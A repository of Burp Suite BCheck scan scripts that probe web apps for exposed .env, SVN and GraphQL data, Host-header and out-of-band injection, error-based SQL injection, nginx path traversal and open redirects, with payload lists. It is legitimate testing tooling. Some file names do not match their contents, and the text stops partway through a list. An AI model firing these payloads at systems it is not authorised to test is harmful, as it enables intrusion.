├── .gitignore
├── sensitive
    ├── svn-exposed.bcheck
    ├── ds-store-exposed.bcheck
    ├── sensitive-file-without-ext-exposed.bcheck
    ├── sensitive-log-file-exposed.bcheck
    └── sensitive-dot-file-exposed.bcheck
├── passives
    ├── interesting-base64-encoded.bcheck
    ├── interesting-parameters.bcheck
    └── interesting-error-message.bcheck
├── testing
    └── appending-json.bcheck
├── common
    ├── laravel-env-exposed.bcheck
    └── graphql-introspection-enabled.bcheck
├── vulnerability-classes
    ├── host-header-injection.bcheck
    ├── interesting-pingback-via-param.bcheck
    ├── interesting-pingback-via-header.bcheck
    ├── error-based-sql-injection.bcheck
    ├── open-redirect-on-param.bcheck
    ├── open-redirect-on-path.bcheck
    ├── command-injection-on-param.bcheck
    ├── command-injection-on-header.bcheck
    ├── nginx-off-by-slash.bcheck
    ├── path-traversal-on-param.bcheck
    ├── path-traversal-on-header.bcheck
    └── path-traversal-on-path.bcheck
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
1 | issues.md


--------------------------------------------------------------------------------
/sensitive/svn-exposed.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "SVN Configuration File Exposed"
 4 |     description: "Tests for exposed svn config in current path and at the root directory of site"
 5 |     author: "j3ssie"
 6 |     tags: "exposure", "svn", "config", "file"
 7 | 
 8 | run for each:
 9 |     potential_path = ".svn/entries", ".svn/text", ".svn/all-wcprops"
10 | 
11 | given path then
12 |     # replace the potential path with the last path
13 |     # like if the path is `/v1/settings/public`. it will be convert to  `/v1/settings/{potential_path}`
14 |     if not({base.request.url.path} is "/") then
15 |         send request called check:
16 |             method: "GET"
17 |             replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{potential_path}`
18 | 
19 |     end if
20 |     
21 |     # replace the potential path with entire URI
22 |     send request called check1:
23 |         method: "GET"
24 |         replacing path: `{regex_replace({base.request.url}, "^.*", "")}/{potential_path}`
25 | 
26 |     if {latest.response.status_code} is "200" then
27 |         if ("END" in {latest.response.body} and
28 |             "svn:" in {latest.response.body}) or
29 |             ("dir" in {latest.response.body} and
30 |             "<entry:" in {latest.response.body}) then
31 |             report issue:
32 |                 severity: low
33 |                 confidence: tentative
34 |                 detail: `SVN configuration found at {potential_path}.`
35 |         end if
36 |     end if
37 | 


--------------------------------------------------------------------------------
/passives/interesting-base64-encoded.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Interesting base64 encoded data in URL"
 4 |     description: "Identifies interesting base64 encoded data like JSON, PHP Object in requests/response"
 5 |     author: "j3ssie"
 6 |     tags: "passive", "base64", "encode", "interesting", "noise"
 7 | 
 8 | define:
 9 |     references = `
10 |     ## References:
11 |     - https://portswigger.net/kb/issues/00700200_base64-encoded-data-in-parameter
12 | 
13 |     - https://cheatsheetseries.owasp.org/index.html
14 |     - https://portswigger.net/burp/documentation/scanner/vulnerabilities-list
15 | 
16 |     ## List of rule taking from:
17 |     - https://github.com/tomnomnom/gf/blob/master/examples/base64.json
18 |     `
19 |     issueRemediation = `Identifies interesting base64 encoded data like JSON, PHP Object in requests/response. Manual Review is recommended.
20 |     {references}`
21 | 
22 | given response then
23 |     if {base.response} matches "([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}" then
24 |         report issue and continue:
25 |             severity: info
26 |             confidence: tentative
27 |             detail: `Interesting Base64-encoded information discovered within the response.`
28 |             remediation: `{issueRemediation}`
29 |     end if
30 | 
31 |     if {base.request} matches "([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}" then
32 |         report issue and continue:
33 |             severity: info
34 |             confidence: tentative
35 |             detail: `Interesting Base64-encoded information discovered within the request.`
36 |             remediation: `{issueRemediation}`
37 |     end if
38 | 


--------------------------------------------------------------------------------
/sensitive/ds-store-exposed.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Nginx off by slash"
 4 |     description: "Path traversal via Nginx Misconfiguration | Nginx off-by-slash"
 5 |     author: "j3ssie"
 6 |     tags: "nginx", "path-traversal", "off-by-slash", "injection"
 7 | 
 8 | define:
 9 |     references = `
10 |     ## References:
11 |     - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
12 |     - https://github.com/bayotop/off-by-slash
13 |     - https://github.com/yandex/gixy/blob/master/docs/en/plugins/aliastraversal.md
14 |     - https://labs.hakaioffsec.com/nginx-alias-traversal/
15 |     `
16 |     issueRemediation = `Nginx off by slash. Manual Review is recommended.
17 |     {references}`
18 |     issueDetail = `Nginx off by slash`
19 | 
20 | run for each:
21 |     injections = "..", "..;", "."
22 |     file = "js", "static", "img"
23 | 
24 | given path then
25 |     # append the injection to the first part of the path
26 |     # e.g: /static/main.js -> this will send the request to /static{injections}/main.js
27 |     send request called check1:
28 |         method: "GET"
29 |         replacing path: {regex_replace({base.request.url.path}, "\.*([^\/]+)\/", `$1{injections}/`)}
30 | 
31 |     send request called check2:
32 |         method: "GET"
33 |         replacing path: {regex_replace({base.request.url.path}, "\.*([^\/]+)\/", `$1{injections}/{file}`)}
34 | 
35 | 
36 |     # if the response of '/static/main.js' and  '/static{injections}/main.js' is the same then we have an issue
37 |     if {check1.response.status_code} is "200" then
38 |         if {check1.response.body} is {base.response.body} then
39 |             report issue:
40 |                 severity: High
41 |                 confidence: tentative
42 |                 detail: `{issueDetail}`
43 |                 remediation: `{issueRemediation}`
44 |         end if
45 |     end if
46 | 


--------------------------------------------------------------------------------
/testing/appending-json.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v1-beta
 3 |     name: "Laravel Environment file exposed"
 4 |     description: "Laravel .env file holds confidential data such as database credentials and tokens and should not be accessible to the public"
 5 |     author: "j3ssie"
 6 |     tags: "exposure", "laravel", "env", "file"
 7 | 
 8 | run for each:
 9 |     potential_path =
10 |         ".env",
11 |         "api/.env",
12 |         "laravel/.env",
13 |         "test/.env",
14 |         "vendor/.env",
15 |         "sites/.env",
16 |         ".env.dev.local",
17 |         ".env.development.local",
18 |         ".env.prod.local",
19 |         ".env.production.local",
20 |         ".env.local",
21 |         ".env.example",
22 |         ".env.stage",
23 |         ".env.live",
24 |         ".env",
25 |         ".env.bak",
26 |         ".env.dev",
27 |         ".env.dev.local",
28 |         ".env.development.local",
29 |         ".env.prod",
30 |         ".env.prod.local",
31 |         ".env.production",
32 |         ".env.production.local",
33 |         ".env.local",
34 |         ".env.example",
35 |         ".env.stage",
36 |         ".env.live",
37 |         ".env.backup",
38 |         ".env.save",
39 |         ".env.old",
40 |         ".env.www",
41 |         ".env_1",
42 |         ".env_sample",
43 |         "api/.env"
44 | 
45 | given request then
46 |     # replace the potential path with the last path
47 |     send request called check:
48 |         method: "GET"
49 |         replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{potential_path}`
50 | 
51 |     # replace the potential path with entire URI
52 |     send request called check:
53 |         method: "GET"
54 |         replacing path: `{regex_replace({base.request.url}, "^.*", "")}/{potential_path}`
55 | 
56 |     if {check.response.status_code} is "200" and
57 |         "APP_ENV" in {check.response.body} then
58 |         if {check.response.headers} matches "text/plain" or
59 |             {check.response.headers} matches "octet-stream" then
60 |             report issue:
61 |                 severity: high
62 |                 confidence: tentative
63 |                 detail: `Laravel Environment file exposed at {potential_path}.`
64 |         end if
65 |     end if
66 | 


--------------------------------------------------------------------------------
/common/laravel-env-exposed.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Laravel Environment file exposed"
 4 |     description: "Laravel .env file holds confidential data such as database credentials and tokens and should not be accessible to the public"
 5 |     author: "j3ssie"
 6 |     tags: "exposure", "laravel", "env", "file"
 7 | 
 8 | run for each:
 9 |     potential_path =
10 |         ".env",
11 |         "api/.env",
12 |         "laravel/.env",
13 |         "test/.env",
14 |         "vendor/.env",
15 |         "sites/.env",
16 |         ".env.dev.local",
17 |         ".env.development.local",
18 |         ".env.prod.local",
19 |         ".env.production.local",
20 |         ".env.local",
21 |         ".env.example",
22 |         ".env.stage",
23 |         ".env.live",
24 |         ".env",
25 |         ".env.bak",
26 |         ".env.dev",
27 |         ".env.dev.local",
28 |         ".env.development.local",
29 |         ".env.prod",
30 |         ".env.prod.local",
31 |         ".env.production",
32 |         ".env.production.local",
33 |         ".env.local",
34 |         ".env.example",
35 |         ".env.stage",
36 |         ".env.live",
37 |         ".env.backup",
38 |         ".env.save",
39 |         ".env.old",
40 |         ".env.www",
41 |         ".env_1",
42 |         ".env_sample",
43 |         "api/.env"
44 | 
45 | given request then
46 |     # replace the potential path with entire URI
47 |     send request called check:
48 |         method: "GET"
49 |         replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{potential_path}`
50 | 
51 |     # replace the potential path with entire URI
52 |     send request called check1:
53 |         method: "GET"
54 |         replacing path: `{regex_replace({base.request.url}, "^.*", "")}/{potential_path}`
55 | 
56 |     if {latest.response.status_code} is "200" and
57 |         "APP_ENV" in {latest.response.body} then
58 |         if {latest.response.headers} matches "text/plain" or
59 |             {latest.response.headers} matches "octet-stream" then
60 |             report issue:
61 |                 severity: high
62 |                 confidence: tentative
63 |                 detail: `Laravel Environment file exposed at {potential_path}.`
64 |         end if
65 |     end if
66 | 
67 | 


--------------------------------------------------------------------------------
/vulnerability-classes/host-header-injection.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Host Header Injection"
 4 |     description: "Interesting PingPack via Header"
 5 |     author: "j3ssie"
 6 |     tags: "oast", "out-of-band", "interesting", "host-header",  "collaborator", "injection"
 7 | 
 8 | define:
 9 |     references = `
10 |     ## References:
11 |     - https://portswigger.net/web-security/host-header/exploiting
12 |     - https://portswigger.net/web-security/host-header
13 |     `
14 |     issueRemediation = `Avoid using the Host header altogether in server-side code. Double-check whether each URL really needs to be absolute
15 |     {references}`
16 |     issueDetail = `Host header injection vulnerability allows attackers to manipulate HTTP requests by altering the host header, potentially leading to unauthorized access or server-side request forgery.`
17 |     # generate a random collaborator address
18 |     oastify1 = `{generate_collaborator_address()}`
19 |     oastify2 = `{generate_collaborator_address()}`
20 |     oastify3 = `{generate_collaborator_address()}`
21 | 
22 | given request then
23 |     send request called check1:
24 |         headers:
25 |             "Host": `{oastify1}`
26 | 
27 |     send request called check2:
28 |         `GET {base.request.url} HTTP/1.1
29 |     Host: {oastify2}
30 |     `
31 | 
32 |     send request called check3:
33 |         `GET {base.request.url.path} HTTP/1.1
34 |         Host: {oastify3}
35 |     Host: {base.request.url.host}
36 |     `
37 | 
38 |     if http interactions then
39 |         report issue:
40 |             severity: high
41 |             confidence: tentative
42 |             detail: {issueDetail}
43 |             remediation: {issueRemediation}
44 |     end if
45 | 
46 |     if dns interactions then
47 |         report issue:
48 |             severity: medium
49 |             confidence: tentative
50 |             detail: {issueDetail}
51 |             remediation: {issueRemediation}
52 |     end if
53 | 
54 |     if (`{oastify1}` in {check1.response.body}) or
55 |         (`{oastify2}` in {check2.response.body}) or
56 |         (`{oastify3}` in {check3.response.body}) then
57 |         report issue:
58 |             severity: high
59 |             confidence: certain
60 |             detail: `{issueDetail}`
61 |             remediation: `{issueRemediation}`
62 |     end if
63 | 


--------------------------------------------------------------------------------
/vulnerability-classes/interesting-pingback-via-param.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Interesting PingPack via Parameter"
 4 |     description: "Interesting PingPack via Parameter"
 5 |     author: "j3ssie"
 6 |     tags: "oast", "out-of-band", "interesting", "collaborator", "noise"
 7 | 
 8 | define:
 9 |     references = `
10 |     ## References:
11 |     - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
12 |     - https://github.com/PortSwigger/collaborator-everywhere
13 |     - https://portswigger.net/web-security/host-header/exploiting
14 |     `
15 |     issueRemediation = `Avoid using the Host header altogether in server-side code. Double-check whether each URL really needs to be absolute
16 |     {references}`
17 |     issueDetail = `Intriguing pingpack via Parameter that worth checking out at {latest.request.url}`
18 | 
19 | run for each:
20 |     payload =
21 |         `u=http://{generate_collaborator_address()}/`,
22 |         `href=http://{generate_collaborator_address()}/`,
23 |         `action=http://{generate_collaborator_address()}/`,
24 |         `host={generate_collaborator_address()}`,
25 |         `http_host={generate_collaborator_address()}`,
26 |         `email=root@{generate_collaborator_address()}`,
27 |         `url=http://{generate_collaborator_address()}/`,
28 |         `load=http://{generate_collaborator_address()}/`,
29 |         `preview=http://{generate_collaborator_address()}/`,
30 |         `target=http://{generate_collaborator_address()}/`,
31 |         `proxy=http://{generate_collaborator_address()}/`,
32 |         `from=http://{generate_collaborator_address()}/`,
33 |         `src=http://{generate_collaborator_address()}/`,
34 |         `ref=http://{generate_collaborator_address()}/`,
35 |         `referrer=http://{generate_collaborator_address()}/`
36 | 
37 | given request then
38 |     send request called check:
39 |         method: "GET"
40 |         appending queries: `{payload}`
41 | 
42 |     if http interactions then
43 |         report issue:
44 |             severity: high
45 |             confidence: tentative
46 |             detail: `{issueDetail}`
47 |             remediation: `{issueRemediation}`
48 |     end if
49 | 
50 |     if dns interactions then
51 |         report issue:
52 |             severity: medium
53 |             confidence: tentative
54 |             detail: `{issueDetail}`
55 |             remediation: `{issueRemediation}`
56 |     end if


--------------------------------------------------------------------------------
/vulnerability-classes/interesting-pingback-via-header.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Interesting PingPack via Header"
 4 |     description: "Interesting PingPack via Header"
 5 |     author: "j3ssie"
 6 |     tags: "oast", "out-of-band", "interesting", "collaborator", "noise"
 7 | 
 8 | define:
 9 |     references = `
10 |     ## References:
11 |     - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
12 |     - https://github.com/PortSwigger/collaborator-everywhere
13 |     - https://portswigger.net/web-security/host-header/exploiting
14 |     `
15 |     issueRemediation = `Avoid using the Host header altogether in server-side code. Double-check whether each URL really needs to be absolute
16 |     {references}`
17 |     issueDetail = `Intriguing pingpack via header that worth checking out at {latest.request.url}`
18 | 
19 | given request then
20 |     send request:
21 |         headers:
22 |             "Host": `host.{generate_collaborator_address()}`,
23 |             "Referer": `https://{generate_collaborator_address()}/ref`,
24 |             "Host": `{generate_collaborator_address()}:80@{base.request.url.host}`,
25 |             "X-Original-URL": `http://{generate_collaborator_address()}/`,
26 |             "Profile": `http://{generate_collaborator_address()}/wap.xml`,
27 |             "X-Arbitrary": `http://{generate_collaborator_address()}/`,
28 |             "X-HTTP-DestinationURL": `http://{generate_collaborator_address()}/`,
29 |             "X-Forwarded-Proto": `http://{generate_collaborator_address()}/`,
30 |             "Origin": `http://{generate_collaborator_address()}`,
31 |             "X-Forwarded-Host": `{generate_collaborator_address()}`,
32 |             "X-Forwarded-Server": `{generate_collaborator_address()}`,
33 |             "X-Host": `{generate_collaborator_address()}`,
34 |             "Proxy-Host": `{generate_collaborator_address()}`,
35 |             "Destination": `{generate_collaborator_address()}`,
36 |             "Proxy": `http://{generate_collaborator_address()}`,
37 |             "Via": `1.1 {generate_collaborator_address()}`
38 | 
39 |     if http interactions then
40 |         report issue:
41 |             severity: high
42 |             confidence: tentative
43 |             detail: `{issueDetail}`
44 |             remediation: `{issueRemediation}`
45 |     end if
46 | 
47 |     if dns interactions then
48 |         report issue:
49 |             severity: medium
50 |             confidence: tentative
51 |             detail: `{issueDetail}`
52 |             remediation: `{issueRemediation}`
53 |     end if
54 | 


--------------------------------------------------------------------------------
/common/graphql-introspection-enabled.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Graphql Introspection Query Enabled"
 4 |     description: "Refers to the condition where the GraphQL server allows introspection queries, potentially exposing sensitive schema information"
 5 |     author: "j3ssie"
 6 |     tags: "exposure", "graphql", "introspection"
 7 | 
 8 | define:
 9 |     introQuery = "{\"query\":\"\n    query IntrospectionQuery {\n      __schema {\n        \n        queryType { name }\n        mutationType { name }\n        subscriptionType { name }\n        types {\n          ...FullType\n        }\n        directives {\n          name\n          description\n          \n          locations\n          args {\n            ...InputValue\n          }\n        }\n      }\n    }\n\n    fragment FullType on __Type {\n      kind\n      name\n      description\n      \n      fields(includeDeprecated: true) {\n        name\n        description\n        args {\n          ...InputValue\n        }\n        type {\n          ...TypeRef\n        }\n        isDeprecated\n        deprecationReason\n      }\n      inputFields {\n        ...InputValue\n      }\n      interfaces {\n        ...TypeRef\n      }\n      enumValues(includeDeprecated: true) {\n        name\n        description\n        isDeprecated\n        deprecationReason\n      }\n      possibleTypes {\n        ...TypeRef\n      }\n    }\n\n    fragment InputValue on __InputValue {\n      name\n      description\n      type { ...TypeRef }\n      defaultValue\n      \n      \n    }\n\n    fragment TypeRef on __Type {\n      kind\n      name\n      ofType {\n        kind\n        name\n        ofType {\n          kind\n          name\n          ofType {\n            kind\n            name\n            ofType {\n              kind\n              name\n              ofType {\n                kind\n                name\n                ofType {\n                  kind\n                  name\n                  ofType {\n                    kind\n                    name\n                  }\n                }\n              }\n            }\n          }\n        }\n      }\n    }\n  \"}"
10 | 
11 | run for each:
12 |     potential_path =
13 |         "/",
14 |         "/api",
15 |         "/api/graphql",
16 |         "/console",
17 |         "/graph",
18 |         "/graphiql",
19 |         "/graphql",
20 |         "/graphql/console/",
21 |         "/v1/explorer",
22 |         "/v1/graphiql"
23 | 
24 | given request then
25 |     send request called check:
26 |         method: "POST"
27 |         path: `{potential_path}`
28 |         replacing headers:
29 |             "Content-Type": "application/json"
30 |         body: `{introQuery}`
31 | 
32 |     if {latest.response.status_code} is "200" and
33 |         {latest.response.headers} matches "application/json" then
34 |         if {latest.response.body} matches "__schema" and
35 |             {latest.response.body} matches "defaultValue" and
36 |             {latest.response.body} matches "queryType" then
37 |             report issue:
38 |                 severity: low
39 |                 confidence: firm
40 |                 detail: `Graphql Introspection Query Enabled`
41 |         end if
42 |     end if
43 | 


--------------------------------------------------------------------------------
/vulnerability-classes/error-based-sql-injection.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "Error Based SQL Injection"
 4 |     description: "Inserts a calculation into each parameter to detect suspicious input transformation"
 5 |     author: "j3ssie"
 6 |     tags: "sqli", "error-based", "injection"
 7 | 
 8 | define:
 9 |     issueDetail = `Error-based SQL injection`
10 |     references = `
11 |     References:
12 |     - https://portswigger.net/web-security/sql-injection
13 |     - https://owasp.org/www-community/attacks/SQL_Injection
14 |     - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection
15 |     - https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html`
16 |     issueRemediation = `Ensure clear, descriptive error messages with guidance on resolution steps
17 |      {references}`
18 | 
19 | run for each:
20 |     injections = `'"`, `"`, `'`
21 | 
22 | given insertion point then
23 |     send payload:
24 |         appending: {injections}
25 | 
26 |     send payload:
27 |         replacing: {injections}
28 | 
29 |     # SQL error
30 |     if {latest.response.body} matches "You have an error in your SQL syntax" or
31 |         {latest.response.body} matches "Error: Unknown column" or
32 |         {latest.response.body} matches "MySqlClient\." or
33 |         {latest.response.body} matches "com\.mysql\.jdbc\.exceptions" or
34 |         {latest.response.body} matches "Illegal mix of collations \([\w\s\,]+\) and \([\w\s\,]+\) for operation" or
35 |         {latest.response.body} matches "valid MySQL result" or
36 |         {latest.response.body} matches "warning mysql_" or
37 |         {latest.response.body} matches "CLI Driver.*DB2" or
38 |         {latest.response.body} matches "db2_\w+\(" or
39 |         {latest.response.body} matches "DB2 SQL error" or
40 |         {latest.response.body} matches "\bdb2_\w+\(" or
41 |         {latest.response.body} matches "\[(ODBC SQL Server Driver|SQL Server|ODBC Driver Manager)\]" or
42 |         {latest.response.body} matches "Unclosed quotation mark" or
43 |         {latest.response.body} matches "warning.*mssql_.*" or
44 |         {latest.response.body} matches "Driver.* SQL[-_]*Server" or
45 |         {latest.response.body} matches "(\W|\A)SQL Server.*Driver" or
46 |         {latest.response.body} matches "Conversion failed when converting the" or
47 |         {latest.response.body} matches "Cannot initialize the data source object of OLE DB provider" or
48 |         {latest.response.body} matches "QUERY\s+\[thread1\] SyntaxError:" or
49 |         {latest.response.body} matches "uncaught exception:" or
50 |         {latest.response.body} matches "PostgreSQL.*ERROR" or
51 |         {latest.response.body} matches "Warning.*\Wpg_.*" or
52 |         {latest.response.body} matches "Wvalid PostgreSQL result" or
53 |         {latest.response.body} matches "Npgsql\." or
54 |         {latest.response.body} matches "org\.postgresql\.util\.PSQLException" or
55 |         {latest.response.body} matches "SQLite/JDBCDriver" or
56 |         {latest.response.body} matches "SQLite.Exception" or
57 |         {latest.response.body} matches "System.Data.SQLite.SQLiteException" or
58 |         {latest.response.body} matches "Warning.*sqlite_.*" or
59 |         {latest.response.body} matches "Warning.*SQLite3::" or
60 |         {latest.response.body} matches "Warning.*sqlite_.*" or
61 |         {latest.response.body} matches "\[SQLITE_ERROR\]" or
62 |         {latest.response.body} matches "org\.hsqldb\.jdbc" or
63 |         {latest.response.body} matches "Dynamic SQL Error" or
64 |         {latest.response.body} matches "\[function.ibase.query\]" or
65 |         {latest.response.body} matches "Warning.*maxdb.*" or
66 |         {latest.response.body} matches "Warning.*ingre_" or
67 |         {latest.response.body} matches "Warning.*ibase_.*" or
68 |         {latest.response.body} matches "(?i)Warning.*sybase.*" or
69 |         {latest.response.body} matches "SQL error.*POS([0-9]+).*" or
70 |         {latest.response.body} matches "Ingres SQLSTATE" or
71 |         {latest.response.body} matches "Ingres\W.*Driver" or
72 |         {latest.response.body} matches "DB Error:" then
73 |         report issue:
74 |             severity: high
75 |             confidence: firm
76 |             detail: `{issueDetail}`
77 |             remediation: `{issueRemediation}`
78 |     end if
79 | 


--------------------------------------------------------------------------------
/vulnerability-classes/open-redirect-on-param.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Open Redirect on Parameter"
  4 |     description: "Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input"
  5 |     author: "j3ssie"
  6 |     tags: "open-redirect", "injection"
  7 | 
  8 | define:
  9 |     issueDetail = `Open Redirect via Parameter"`
 10 |     references = `
 11 |     ## References:
 12 |     - https://portswigger.net/web-security/sql-injection
 13 |     - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html`
 14 |     issueRemediation = `Implement a validation to restrict redirects to trusted domains only
 15 |      {references}`
 16 | 
 17 | run for each:
 18 |     injections =
 19 |         `/%09/example.com`,
 20 |         `/%2f%2fexample.com`,
 21 |         `/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/`,
 22 |         `/%5cexample.com`,
 23 |         `/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d`,
 24 |         `/.example.com`,
 25 |         `//%09/example.com`,
 26 |         `//%5cexample.com`,
 27 |         `///%09/example.com`,
 28 |         `///%5cexample.com`,
 29 |         `////%09/example.com`,
 30 |         `////%5cexample.com`,
 31 |         `/////example.com`,
 32 |         `/////example.com/`,
 33 |         `////\;@example.com`,
 34 |         `////example.com/`,
 35 |         `////example.com/%2e%2e`,
 36 |         `////example.com/%2e%2e%2f`,
 37 |         `////example.com/%2f%2e%2e`,
 38 |         `////example.com/%2f..`,
 39 |         `////example.com//`,
 40 |         `///\;@example.com`,
 41 |         `///example.com`,
 42 |         `///example.com/`,
 43 |         `///example.com/%2e%2e`,
 44 |         `///example.com/%2e%2e%2f`,
 45 |         `///example.com/%2f%2e%2e`,
 46 |         `///example.com/%2f..`,
 47 |         `///example.com//`,
 48 |         `//example.com`,
 49 |         `//example.com/`,
 50 |         `//example.com/%2e%2e`,
 51 |         `//example.com/%2e%2e%2f`,
 52 |         `//example.com/%2f%2e%2e`,
 53 |         `//example.com/%2f..`,
 54 |         `//example.com//`,
 55 |         `//google%00.com`,
 56 |         `//google%E3%80%82com`,
 57 |         `//https:///example.com/%2e%2e`,
 58 |         `//https://example.com/%2e%2e%2f`,
 59 |         `//https://example.com//`,
 60 |         `/<>//example.com`,
 61 |         `/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com`,
 62 |         `/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com`,
 63 |         `/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com`,
 64 |         `/\/\/example.com/`,
 65 |         `/\/example.com/`,
 66 |         `/example.com/%2f%2e%2e`,
 67 |         `/http://%67%6f%6f%67%6c%65%2e%63%6f%6d`,
 68 |         `/http://example.com`,
 69 |         `/http:/example.com`,
 70 |         `/https:/%5cexample.com/`,
 71 |         `/https://%09/example.com`,
 72 |         `/https://%5cexample.com`,
 73 |         `/https:///example.com/%2e%2e`,
 74 |         `/https:///example.com/%2f%2e%2e`,
 75 |         `/https://example.com`,
 76 |         `/https://example.com/`,
 77 |         `/https://example.com/%2e%2e`,
 78 |         `/https://example.com/%2e%2e%2f`,
 79 |         `/https://example.com/%2f%2e%2e`,
 80 |         `/https://example.com/%2f..`,
 81 |         `/https://example.com//`,
 82 |         `/https:example.com`,
 83 |         `/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com`,
 84 |         `/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com`,
 85 |         `/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com`
 86 | 
 87 | given insertion point then
 88 |     send payload:
 89 |         replacing: {injections}
 90 | 
 91 |     if {latest.response.status_code} is "301" or
 92 |         {latest.response.status_code} is "302" then
 93 |         # Make sure the Location: header is not contains the original domain
 94 |         if ({injections} in {latest.response.headers}) and
 95 |             not({base.request.url.host} in {latest.response.headers}) then
 96 |             report issue:
 97 |                 severity: low
 98 |                 confidence: firm
 99 |                 detail: `{issueDetail}`
100 |                 remediation: `{issueRemediation}`
101 |         end if
102 |     end if
103 | 


--------------------------------------------------------------------------------
/vulnerability-classes/open-redirect-on-path.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Open Redirect on Path"
  4 |     description: "Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input"
  5 |     author: "j3ssie"
  6 |     tags: "open-redirect", "injection"
  7 | 
  8 | define:
  9 |     issueDetail = `Open Redirect on Path`
 10 |     references = `
 11 |     ## References:
 12 |     - https://portswigger.net/web-security/sql-injection
 13 |     - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html`
 14 |     issueRemediation = `Implement a validation to restrict redirects to trusted domains only
 15 |      {references}`
 16 | 
 17 | run for each:
 18 |     injections =
 19 |         `/%09/example.com`,
 20 |         `/%2f%2fexample.com`,
 21 |         `/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/`,
 22 |         `/%5cexample.com`,
 23 |         `/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d`,
 24 |         `/.example.com`,
 25 |         `//%09/example.com`,
 26 |         `//%5cexample.com`,
 27 |         `///%09/example.com`,
 28 |         `///%5cexample.com`,
 29 |         `////%09/example.com`,
 30 |         `////%5cexample.com`,
 31 |         `/////example.com`,
 32 |         `/////example.com/`,
 33 |         `////\;@example.com`,
 34 |         `////example.com/`,
 35 |         `////example.com/%2e%2e`,
 36 |         `////example.com/%2e%2e%2f`,
 37 |         `////example.com/%2f%2e%2e`,
 38 |         `////example.com/%2f..`,
 39 |         `////example.com//`,
 40 |         `///\;@example.com`,
 41 |         `///example.com`,
 42 |         `///example.com/`,
 43 |         `///example.com/%2e%2e`,
 44 |         `///example.com/%2e%2e%2f`,
 45 |         `///example.com/%2f%2e%2e`,
 46 |         `///example.com/%2f..`,
 47 |         `///example.com//`,
 48 |         `//example.com`,
 49 |         `//example.com/`,
 50 |         `//example.com/%2e%2e`,
 51 |         `//example.com/%2e%2e%2f`,
 52 |         `//example.com/%2f%2e%2e`,
 53 |         `//example.com/%2f..`,
 54 |         `//example.com//`,
 55 |         `//google%00.com`,
 56 |         `//google%E3%80%82com`,
 57 |         `//https:///example.com/%2e%2e`,
 58 |         `//https://example.com/%2e%2e%2f`,
 59 |         `//https://example.com//`,
 60 |         `/<>//example.com`,
 61 |         `/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com`,
 62 |         `/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com`,
 63 |         `/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com`,
 64 |         `/\/\/example.com/`,
 65 |         `/\/example.com/`,
 66 |         `/example.com/%2f%2e%2e`,
 67 |         `/http://%67%6f%6f%67%6c%65%2e%63%6f%6d`,
 68 |         `/http://example.com`,
